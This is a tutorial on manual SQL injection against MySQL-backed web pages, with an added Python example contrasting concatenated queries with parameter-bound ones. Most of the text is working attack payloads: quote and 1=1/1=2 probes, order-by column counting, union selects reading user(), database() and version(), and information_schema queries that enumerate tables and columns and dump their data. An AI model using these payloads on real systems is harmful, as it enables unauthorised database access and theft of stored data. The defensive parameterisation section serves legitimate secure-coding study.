This article covers manual SQL injection, including how to determine the injection point and the injection type. I hope it will be helpful to everyone.
1. Single quotation mark method: add a single quotation mark directly after the URL. If the page cannot be displayed normally and the browser returns exception information, the link may have a SQL injection vulnerability.
2. 1=1 and 1=2 method: add and 1=1 to the GET parameter after the URL and the page displays normally; replace 1=1 with 1=2 and the page displays abnormally. This indicates that there is SQL injection in the web page.
1. Numeric injection: the value of the injected variable does not need to be enclosed in quotation marks, such as
select * from user where id=$id;
2. Character injection: the injected variable is wrapped in quotation marks, such as
select * from user where username='$username';
Be sure to close the quotation marks when injecting.
3. Search injection:
select * from user where username like '%$pass%';
The constructed SQL statement is
select * from user where username like '%$pass%' union select statement '%%';
That is, the variable passed in is pass%' union select statement '% so that the quotation marks are closed.
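The three query shapes above, seen from the defender's side, as an added example that is not part of the original article: each concatenated query next to a parameter-bound version, with the single-quote and 1=1 / 1=2 probes sent to both. Assumptions: Python's sqlite3 stands in for MySQL, and the rows and function names are constructed for illustration.

```python
import sqlite3
# Constructed rows; sqlite3 stands in for MySQL so this runs offline.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("create table user (id integer, username text)")
    db.executemany("insert into user values (?, ?)",
                   [(1, "alice"), (2, "bob"), (3, "100%_real")])
    return db

# Vulnerable: the page's numeric and character shapes, built by concatenation.
def numeric_vuln(db, id_):
    return db.execute("select * from user where id=" + id_).fetchall()

def char_vuln(db, username):
    sql = "select * from user where username='" + username + "'"
    return db.execute(sql).fetchall()

# Hardened: input is bound as a parameter and never parsed as SQL.
def numeric_safe(db, id_):
    try:
        value = int(id_)  # a numeric parameter must really be a number
    except ValueError:
        return []
    return db.execute("select * from user where id=?", (value,)).fetchall()

def char_safe(db, username):
    return db.execute("select * from user where username=?", (username,)).fetchall()

def search_safe(db, term):
    # Binding stops injection; escaping % and _ keeps them literal in LIKE.
    esc = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "select * from user where username like ? escape '\\'"
    return db.execute(sql, ("%" + esc + "%",)).fetchall()

def probe_results(db):
    """Send the page's probes to both forms and record what each returns."""
    out = {"vuln_true": numeric_vuln(db, "1 and 1=1"),
           "vuln_false": numeric_vuln(db, "1 and 1=2"),
           "safe_true": numeric_safe(db, "1 and 1=1"),
           "safe_false": numeric_safe(db, "1 and 1=2"),
           "safe_quote": char_safe(db, "alice'")}
    try:
        char_vuln(db, "alice'")
        out["vuln_quote"] = "ok"
    except sqlite3.OperationalError:
        out["vuln_quote"] = "sql error"
    return out
if __name__ == "__main__":
    print(probe_results(make_db()))
```

With bound parameters the 1=1 and 1=2 probes return the same empty result and the single quote is treated as data, so the page no longer behaves differently between probes.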
Determine whether the injection point submission method is GET, POST, or cookie through packet capture and other methods.
Use the order by statement to query how many fields there are. You can determine the number of fields through repeated attempts. For example, when order by 9 is entered the page reports an error, and when order by 8 is entered the page displays normally; that is, there are 8 fields.
For example, the query statement is: select * from user where id='$id';
The following input can be constructed: id = ' order by 3 -- 
That is, the query statement is: select * from user where id='' order by 3 -- '
Use the union select statement to query the current user user(), the database database(), the database version version(), the server operating system @@version_compile_os, and other information.
The version is very important. If the version is 5.0 or above, you can use the information_schema library to easily query the desired information.
Constructed statement:
select * from user where id='' union select user(),database(),version() -- ';
The information_schema library that comes with MySQL 5.0 or above stores all table name and column name information in the database.
Information_schema.tables: a table that records all table name information in the database.
Next, based on the current database found by the query in step 5 (for example, the database is database_1), we should look up the information of all of its tables.
The constructed query statement is as follows:
select * from user where id='' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='database_1' -- ';
The result of the query is the table name information in the current database queried in the fifth step.
Information_schema.columns: records the column name information of all tables in the database.
Next, query the column name information based on the table name obtained from the above query (for example, the table is table_1). Construct the statement as follows:
select * from user where id='' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='table_1' -- ';
After querying the column names, you can directly find the information stored in the table through a union query (for example, the column names found are column_1 and column_2). Construct the statement:
select * from user where id='' union select 1,column_1,column_2 from table_1 -- ';
This queries the data stored in the specified table of the specified database.